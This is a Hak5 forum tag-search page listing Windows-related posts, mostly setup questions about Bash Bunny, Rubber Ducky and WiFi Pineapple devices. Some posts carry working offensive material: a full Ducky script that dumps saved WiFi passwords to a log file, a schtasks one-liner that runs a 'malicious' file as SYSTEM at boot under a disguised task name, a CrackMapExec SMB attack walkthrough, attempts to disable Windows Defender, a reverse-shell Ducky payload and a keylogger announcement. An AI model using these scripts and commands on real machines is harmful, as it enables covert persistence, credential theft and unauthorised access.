Jump to content

Search the Community

Showing results for tags 'WINDOWS'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. When I connect the Bash Bunny with ATTACKMODE RNDIS_ETHERNET it sets itself as a default network interface, which is desired in most cases. However, I would like it to show up as a secondary interface as part of my payload requires actual internet. Since the Bash Bunny doesn't have internet itself, it can't provide internet to the windows box. It would be nice if I could configure the Bash Bunny to show up as a non-default interface. It is possible to change the metric in powershell, so if my payload uses powershell, I can do this to change it: Get-NetAdapter | Where-Object -FilterScript {$_.LinkSpeed -Eq "2 Gbps"} | Set-NetIPInterface -InterfaceMetric 100
  2. So I literally just finished copying this tutorial ... https://www.youtube.com/watch?v=fmRRX7-G4lc And everything went smoothly... Apart from when I plugged in the duck... Nothing happened on my Kali MSF... No shells were caught? I should first off mention that my target machine was actually a 64 bit windows, so i had to change the msfvenom -a to x64 and change the payload to windows/x64/meterpreter/reverse_tcp... But besides that everything went ok... So because the shell wasnt being caught, I decided to open up powershell my self, and manually type in the code that the ducky inject.bin is trying to run in powershell.... and i got this error... So I think the reason nothing happens when I plug the duck in, is because in the background (because obviously it is commanded to be hidden in the inject.bin) this is happening... making MSF not catch a shell... Please could anyone take a look at this and help me overcome this error please. I would be forever grateful! Thank you hak5 enthusiasts! <3
  3. I am trying to stop service MsMpSvc but it dosen't seem to work. I have tried following : 1) net stop MsMpSvc 2) sc config MsMpSvc start= disabled It gives me following error : [SC] OpenService FAILED 5: Access is denied. And I do have admin privileges.
  4. I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?
  5. I am trying to setup wifi pineapple nano but when I get to the part with load bulletin it crashes my PC and gives me the error in this picture. Also when I try to do "firmware upgrade" to also check if it's working I get this error: "Error connecting to WiFiPineapple.com. Please check your connection." Any Help?
  6. https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber It has been a while since my script was updated so if anyone want to want to help make it more effective or make it faster it would be much appreciated :D
  7. I just received my Pineapple nano today and installed everything on my laptop running Windows. I also wanted to ensure I could use the same nano on my android when I'm mobile, but I'm running into difficulties getting the android to connect to the nano. The pineapple connector app prompts for USB tethering, which is enabled, but continually attempts to connect with no result and no installation screen...just the loading circle. Any advice or assistance would be much appreciated. I wasn't sure if its because now that the pineapple nano has been setup via the Windows environment if there is an alternative way I have to connect the pineapple to interface with other environments as well (i.e. Linux/Android). Chris
  8. How to make a USB hacking tool? how to hack into systems with a usb just by inserting and creating a backdoor of it?
  9. Hello, i just got my bash bunny yday, and i tried fews payloads straight after setting up languages & tools. I only managed to run, with the 1.3 firmware, the PasswordGrabber exploit with the lazaro.exe on a windows 7 computer. All others scripts claming "browsers creds" and other, are actually not working, on the 1.3. I can read that many people managed to make it work on a 1.2 or 1.1 version. If any of you, could actually tell me if this is a known problem, or tell me if you managed to run a creds grabber on a win8 or 10, with the 1.3 firmware. Thx for your answers :)
  10. At first: Sorry for my bad English, I´m german and only 14 years old. I upload an .exe file from my computer to my FTP Server with the FTP.exe(cmd). Before I did that it was working just fine. But after I downloaded it, it comes up with the following error: "The file is not compatible with your computer." Before that, it came up with another error, something like "not compatible with a 64 Bit System. I accidently asked the question on StackOverflow 2 hours ago, and some people answered that I have to active binary mode. When I do that with the "binary" command, I get an answer that the activation was successful, but it isn´t working anyways. The .exe looks identical after download, but instead of having the old icon it shows up the standard .exe icon. I do not want to use another FTP program like FileZilla or ncftp (I tried it with FileZilla, it isn´t working either, so I don´t think, that FTP.exe is the problem here. The commands I used + Output(maybe the translation isn´t correct, but I think you know what the output meant): C:\WINDOWS\system32>ftp myftpserver.com Connection to icarus.bplaced.net established. 220 Welcome to myftpserver.com, FTP server standing by ... 504 Unknown command User (myftpserver.com:(none)): user 331 Hello user, your FTP account password is required: password: password 230-Login successful, your current directory is / 230 34349 Kbytes used (3%) - authorized: 1048576 Kb ftp> binary 200 TYPE is now 8-bit binary ftp> get example.exe 200 PORT command successful 150-Connecting to port 61051 150 347.5 kbytes to download 226-File successfully transferred 226 1.648 seconds (measured here), 210.83 Kbytes per second FTP: 355794 bytes received in 1.91 seconds 186.38KB/s ftp> Thanks and greetings, c0ntriX Edit: I´m owning a 64-Bit System.
  11. Hi there, I just finished the first version of my BB keylogger. It basicly launches a powershell which keylogs to the loot folder of the BB. Features: Fast launching (thanks to USB Exfil for the one line launcher) Leaves no traces when cleanup is enabled. (Insert feature?) Link: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger VincBreaker PS: I will create a push request upon positive feedback and improve the payload in the other case.
  12. how does the bash bunny gain execution access in mass storage attack mode (in windows)? will it always work when windows autorun is disabled? i would love to get a detailed explanation of how it works
  13. how does the bash bunny gain execution access in mass storage attack mode (in windows)? will it always work when windows autorun is disabled? i would love to get a detailed explanation of how it works
  14. Localized SMB Powershell delivery. For when USB and Web methods are disabled or too noisy. https://github.com/hak5/bashbunny-payloads/pull/172
  15. Violation of CoC
  16. Hi, When I am trying to install the tools_installer payload the bash the green led is plain solid and windows 10 can seem to be able to install the driver for ATTACKMODE SERIAL I guess ? Did anyone manage to solve this ? I can connect to it via SSH (Serial) when in arming mode so I am not sure what is going on. I did try the automatic driver search function and google around a bit for a generic driver but I am still a bit stuck. Can anyone help ? / Albert
  17. Violation of CoC
  18. Hi, I just received my Bash Bunny a few days ago and I've been tinkering around with it. It seems, to me, to be quite buggy: - Windows does not recognise the RNDIS interface at all. Not on Windows 7, not on Windows 10. - On MacOS, the ethernet interface *sometimes* works, sometimes it doesn't. When it does work, *sometimes* it is possible to connect to the Bunny using, quite often, SSH doesn't start up even though FTP and other services are running. This even after a few minutes waiting. - The serial interface often conflicts with having network & storage together, resulting in nothing happening or giving only access to storage. (I did this by adding "SERIAL" to the standard payloads already on the Bunny) - Using the manuals found online for network sharing (MacOS Internet sharing through 172.16.64.64), I cannot access the internet from the Bunny, so I cannot update it. On Windows, that's entirely out of the question as Windows does not even recognise the RNDIS network device. Windows gives the following message on the RNDIS driver: The drivers for this device are not installed. (Code 28) There are no compatible drivers for this device. To find a driver for this device, click Update Driver.
  19. Hey, i just found a method to start your malicious msf/or whatever payload as SYSTEM user from boot. This little shell line (shell needs to be run as administrator): schtasks /create /tn "Windows Help Service" /tr C:\maliciousfile.exe /sc onstart /ru SYSTEM /F creates a Task named "Windows Help Service" which runs C:\maliciousfile.exe every startup as SYSTEM user. Keep in mind that when using this as a payload you may need to escape the / and \ and ".I'm currently working on a C++ Version of PSExec (Source) to get rid of the .Net Framework. Feel free to post your Payload using the simple onliner which starts your malicious file as System every boot :)
  20. CrackMapExec is a fantastic tool developed by Byt3bl33de3r and can be found here: https://github.com/byt3bl33d3r/CrackMapExec As stated in the repo's README, it's powered by Impacket and takes queues and inspiration from several other tools targeting SMB, WMI, and Windows in general. I recommend reading up on it if you are unfamiliar. For now, it's worth mentioning that CrackMapExec (CME) is also a Python library that can be installed with pip and used like a standard tool, i.e. you can type "crackmapexec" and use it without needing a Python script to act as a vehicle. I installed it on the Bunny and have used it for some network based attacks using RNDIS_ETHERNET mode. If you'd like to do the same, I encourage you to install pip. Connect to the Bunny via SSH and use curl with the "insecure" and output file options, like so: cd /pentest curl -k -O https://bootstrap.pypa.io/get-pip.py Now check your Bunny's current system date and time. If it's not current then you need to update it or Python and SSL will throw a fit because the date/time is wrong. Then use Python to run the script: python get-pip.py That may take some time to complete, but pip will open up a lot of possibilities and assist with Python tools and dependencies. Once that's done, you'll need to install packages required for supporting OpenSSL/PyOpenSSL. You'll need to have shared your internet connection with the Bunny for this to work. apt-get install build-essential libssl-dev libffi-dev python-dev Once those packages have been installed successfully, you should now be able to successfully use pip to install CME. If something goes wrong with this next step, it's almost certainly related to the cryptography library and a missing dependency. Read the error carefully and Google it. You can be certain there will be several GitHub and StackOverflow hits at the top. Run pip: pip install crackmapexec Once that is done, you can test everything by just running "crackmapexec" in your terminal and you should see CME spit out its help text and version information. You're now ready to include CME commands in your Bunny payloads. CME is a network attack tool, so you can use it against locked PCs. A very basic example of this is: crackmapexec $TARGET_IP That command tells CME to connect to the target's IP address via SMB. If that much can be done, CME will return a hostname and the target's operating system build. This is a fast "attack" and can be used to, let's say, fingerprint a machine quickly to prove you had access and collect some information. You can go a step further with this: crackmapexec $TARGET_IP -u "" -p "" That tells CME to try a Null session with SMB. If the target disallows Null sessions nothing bad happens. You still get the basic OS details. If the target allows for a Null session to be initiated then you can check for success and then potentially proceed with something like running CME again with the addition of "--shares" to enumerate network shares and gather additional information. If you happen to have a password hash or credentials from an earlier attack (perhaps phishing or passed to you from a teammate), those creds can be used with CME and any CME-based payload can be easily edited to include the credentials for a much wider variety of attacks.
  21. Ok, so here's a payoad that can grab any of the wifi info that the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt" Only works on Windows DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 1000 REM The @ will be typed as " in the Command prompt STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A ENTER DELAY 100 STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A ENTER DELAY 100 STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A ENTER DELAY 100 STRING del A.txt ENTER DELAY 100 STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER Feel free to ask any questions and if there's any errors that need to be fixed on to this.
×
×
  • Create New...